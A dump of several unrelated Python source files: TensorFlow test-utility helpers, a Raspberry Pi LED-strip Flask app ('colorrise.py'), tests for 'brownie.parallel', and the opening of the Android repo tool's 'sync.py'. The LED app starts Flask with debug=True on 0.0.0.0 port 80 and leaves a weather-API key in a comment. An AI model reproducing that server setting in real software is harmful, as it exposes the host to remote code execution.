assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif isinstance(tensor, ops.EagerTensor):
return tensor.numpy()
elif isinstance(tensor, resource_variable_ops.ResourceVariable):
return tensor.read_value().numpy()
elif callable(tensor):
return self._eval_helper(tensor())
else:
raise ValueError("Unsupported type %s." % type(tensor))
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.in_eager_mode():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
This method behaves different than session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
`force_gpu and `use_gpu` are False, all ops are pinned to the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg=msg, equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, dict)
if a_is_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = np.array(a)
b_as_ndarray = np.array(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s." % (path_str,
path_str))
except TypeError as e:
msg = "Error: a%s has %s, but b%s has %s" % (
path_str, type(a), path_str, type(b))
e.args = ((e.args[0] + ' : ' + msg,) + e.args[1:])
raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray`, or any arbitrarily nested of structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray`, or any arbitrarily nested of structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b, err_msg=msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal. %s" %
(device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
|
colorrise.py
|
#!/usr/bin/python
# Color-Rise
# (C) 2016 Mike Estee, MIT License
import time
from colour import Color
from flask import Flask, render_template, request
import threading
# https://github.com/jgarff/rpi_ws281x
import _rpi_ws281x as ws
import neopixel
# https://api.forecast.io/forecast/57fe5197b6b5632dbe542ff8c1cae6ba/37.8267,-122.423
import forecastio
api_key = "your_key_goes_here"
lat = 37.8267
lng = -122.423
# LED strip configuration:
LED_COUNT = 48 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (must support PWM!).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 5 # DMA channel to use for generating signal (try 5)
LED_BRIGHTNESS = 1 # Set to 0 for darkest and 1 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
# global settings for lighting strip
pixels = []
brightness = LED_BRIGHTNESS
strip = neopixel.Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA,
LED_INVERT, LED_BRIGHTNESS*200, 0, ws.WS2811_STRIP_GRB)
def sync_pixels():
strip.setBrightness(brightness*200)
n = 0
for c in pixels:
if isinstance(c, Color) and n<LED_COUNT:
strip.setPixelColorRGB(n, int(c.red*255), int(c.green*255), int(c.blue*255))
n += 1
strip.show()
# Background updating thread for pixels
class PixelThread(object):
def __init__(self, interval=500):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
# continuously update our colors forever
while True:
#sync_pixels()
time.sleep(self.interval/1000.0)
def map(index):
"""Translate index positions to pixel positions"""
index += 2 #first two are blocked
index = (LED_COUNT - index)-1 #invert rotation
index -= (LED_COUNT - 2) / 2
index = index + (LED_COUNT-2) if index < 2 else index # wrap
return index
def localHour():
hour = time.localtime().tm_hour
return hour
def isMorning():
hour = localHour()
if hour >= 6 and hour <= 9:
return True
else:
return False
def isBedtime():
hour = localHour()
if hour >= (12+8) or hour <= 5:
return True
else:
return False
# Main program logic follows:
app = Flask(__name__)
@app.route("/set", methods=['GET'])
def set_color():
global pixels
cstr = request.args['color']
try:
color = Color(cstr)
except:
print "unknown color:" + cstr
return cstr, 200
for n in range(0,LED_COUNT):
pixels[n] = color
sync_pixels()
return cstr, 200
@app.errorhandler(404)
def not_found(error):
return render_template('error.html'), 404
@app.route("/")
def home():
templateData = {
'time': 'now'
}
return render_template('home.html', **templateData)
# main
if __name__ == '__main__':
# initial values for pixels
for n in range(0, LED_COUNT):
pixels.append( Color(hsl=(n/float(LED_COUNT),1,.5)) )
strip.begin()
sync_pixels()
# start update background thread
PixelThread()
# start the flask server
app.run(host='0.0.0.0', port=80, debug=True)
exit()
# start = time.clock() - 3600
# color = Color(255,255,255)
# colorMap = {
# "clear-day" : Color(255, 255, 102), # yellow
# "clear-night" : Color(0, 0, 102), # dark blue
# "rain" : Color(0, 153, 255), # light blue
# "snow" : Color(255,255,255), #white
# "sleet": Color(51, 102, 153), #dark gray blue
# "wind" : Color(102, 153, 153), # gray green
# "fog" : Color(204, 204, 204), #light gray
# "cloudy" : Color(64, 64, 64), #dark gray
# "partly-cloudy-day" : Color(128, 128, 100), #beige
# "partly-cloudy-night" : Color(117, 117, 163), # gray purple
# }
# # if key not in dic:
# while True:
# current = time.clock()
# if (current - start) > 3600:
# start = current
# forecast = forecastio.load_forecast(api_key, lat, lng)
# byHour = forecast.hourly()
# print "forecast for next 24 hours"
# for hour in byHour.data:
# print hour.icon + " " + str(hour.temperature)
# # dim the lights for bedtime
# brightness = LED_BRIGHTNESS
# if isBedtime():
# brightness = brightness/10
# strip.setBrightness(brightness)
# # set the forecast
# pixels = len(byHour.data) / strip.numPixels();
# #print "pixels:" + str(pixels)
# mightRain = False
# for i in range(0,len(byHour.data)):
# hour = byHour.data[i]
# # weather to color
# skyColor = Color(0,0,0)
# if hour.icon in colorMap:
# skyColor = colorMap[hour.icon]
# # will it rain today after 9am?
# if (i%24) > 9 and hour.precipProbability > 10:
# mightRain = True
# # temp
# temp = (hour.temperature - 30.) / 70.0
# tempColor = Color(int(255*temp),0,int(255*(1.0-temp)) )
# if mightRain and isMorning():
# skyColor = Color(0,128,255)
# for n in range(0,pixels):
# strip.setPixelColor(map(i*pixels + n), skyColor )
# strip.show()
# time.sleep(2)
|
parallel.py
|
# coding: utf-8
"""
brownie.tests.parallel
~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.parallel`.
:copyright: 2010 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import time
from threading import Thread
from attest import Tests, Assert, TestBase, test
from brownie.parallel import get_cpu_count, AsyncResult, TimeoutError
tests = Tests()
@tests.test
def test_get_cpu_count():
try:
Assert(get_cpu_count()) > 0
Assert(get_cpu_count()) == get_cpu_count()
except NotImplementedError:
# make sure default is returned if the number of processes cannot be
# determined
Assert(get_cpu_count(2)) == 2
class TestAsyncResult(TestBase):
@test
def wait(self):
aresult = AsyncResult()
def setter(aresult):
time.sleep(1)
aresult.set('foo')
t = Thread(target=setter, args=(aresult, ))
t.start()
with Assert.not_raising(TimeoutError):
aresult.wait(2)
@test
def get(self):
aresult = AsyncResult()
with Assert.raises(TimeoutError):
aresult.get(0.1)
def setter(aresult):
time.sleep(1)
aresult.set('foo')
t = Thread(target=setter, args=(aresult, ))
t.start()
with Assert.not_raising(TimeoutError):
Assert(aresult.get(2)) == 'foo'
aresult.set('foo')
Assert(aresult.get()) == 'foo'
aresult = AsyncResult()
aresult.set(ValueError(), success=False)
with Assert.raises(ValueError):
aresult.get()
@test
def callback_errback(self):
testruns = (['callback', True], ['errback', False])
for kwarg, success in testruns:
l = []
callback = lambda obj, l=l: l.append(obj)
aresult = AsyncResult(**{kwarg: callback})
assert not aresult.ready
aresult.set('foo', success=success)
Assert(len(l)) == 1
Assert(l[0]) == 'foo'
@test
def repr(self):
aresult = AsyncResult()
Assert(repr(aresult)) == 'AsyncResult()'
aresult = AsyncResult(callback=1)
Assert(repr(aresult)) == 'AsyncResult(callback=1)'
aresult = AsyncResult(errback=1)
Assert(repr(aresult)) == 'AsyncResult(errback=1)'
aresult = AsyncResult(callback=1, errback=2)
Assert(repr(aresult)) == 'AsyncResult(callback=1, errback=2)'
tests.register(TestAsyncResult)
|
sync.py
|
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import http.cookiejar as cookielib
import io
import json
import multiprocessing
import netrc
from optparse import SUPPRESS_HELP
import os
import re
import socket
import subprocess
import sys
import tempfile
import time
import urllib.error
import urllib.parse
import urllib.request
import xmlrpc.client
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
import event_log
from git_command import GIT, git_require
from git_config import GetUrlCookieFile
from git_refs import R_HEADS, HEAD
import git_superproject
import gitc_utils
from project import Project
from project import RemoteSpec
from command import Command, MirrorSafeCommand, WORKER_BATCH_SIZE
from error import RepoChangedException, GitError, ManifestParseError
import platform_utils
from project import SyncBuffer
from progress import Progress
from wrapper import Wrapper
from manifest_xml import GitcManifest
_ONE_DAY_S = 24 * 60 * 60
class _FetchError(Exception):
"""Internal error thrown in _FetchHelper() when we don't want stack trace."""
class Sync(Command, MirrorSafeCommand):
jobs = 1
common = True
helpSummary = "Update working tree to the latest revision"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
The '%prog' command synchronizes local project directories
with the remote repositories specified in the manifest. If a local
project does not yet exist, it will clone a new local directory from
the remote repository and set up tracking branches as specified in
the manifest. If the local project already exists, '%prog'
will update the remote branches and rebase any new local changes
on top of the new remote changes.
'%prog' will synchronize all projects listed at the command
line. Projects can be specified either by name, or by a relative
or absolute path to the project's local directory. If no projects
are specified, '%prog' will synchronize all projects listed in
the manifest.
The -d/--detach option can be used to switch specified projects
back to the manifest revision. This option is especially helpful
if the project is currently on a topic branch, but the manifest
revision is temporarily needed.
The -s/--smart-sync option can be used to sync to a known good
build as specified by the manifest-server element in the current
manifest. The -t/--smart-tag option is similar and allows you to
specify a custom tag/label.
The -u/--manifest-server-username and -p/--manifest-server-password
options can be used to specify a username and password to authenticate
with the manifest server when using the -s or -t option.
If -u and -p are not specified when using the -s or -t option, '%prog'
will attempt to read authentication credentials for the manifest server
from the user's .netrc file.
'%prog' will not use authentication credentials from -u/-p or .netrc
if the manifest server specified in the manifest file already includes
credentials.
By default, all projects will be synced. The --fail-fast option can be used
to halt syncing as soon as possible when the first project fails to sync.
The --force-sync option can be used to overwrite existing git
directories if they have previously been linked to a different
object directory. WARNING: This may cause data to be lost since
refs may be removed when overwriting.
The --force-remove-dirty option can be used to remove previously used
projects with uncommitted changes. WARNING: This may cause data to be
lost since uncommitted changes may be removed with projects that no longer
exist in the manifest.
The --no-clone-bundle option disables any attempt to use
$URL/clone.bundle to bootstrap a new Git repository from a
resumeable bundle file on a content delivery network. This
may be necessary if there are problems with the local Python
HTTP client or proxy configuration, but the Git binary works.
The --fetch-submodules option enables fetching Git submodules
of a project from server.
The -c/--current-branch option can be used to only fetch objects that
are on the branch specified by a project's revision.
The --optimized-fetch option can be used to only fetch projects that
are fixed to a sha1 revision if the sha1 revision does not already
exist locally.
The --prune option can be used to remove any refs that no longer
exist on the remote.
# SSH Connections
If at least one project remote URL uses an SSH connection (ssh://,
git+ssh://, or user@host:path syntax) repo will automatically
enable the SSH ControlMaster option when connecting to that host.
This feature permits other projects in the same '%prog' session to
reuse the same SSH tunnel, saving connection setup overheads.
To disable this behavior on UNIX platforms, set the GIT_SSH
environment variable to 'ssh'. For example:
export GIT_SSH=ssh
%prog
# Compatibility
This feature is automatically disabled on Windows, due to the lack
of UNIX domain socket support.
This feature is not compatible with url.insteadof rewrites in the
user's ~/.gitconfig. '%prog' is currently not able to perform the
rewrite early enough to establish the ControlMaster tunnel.
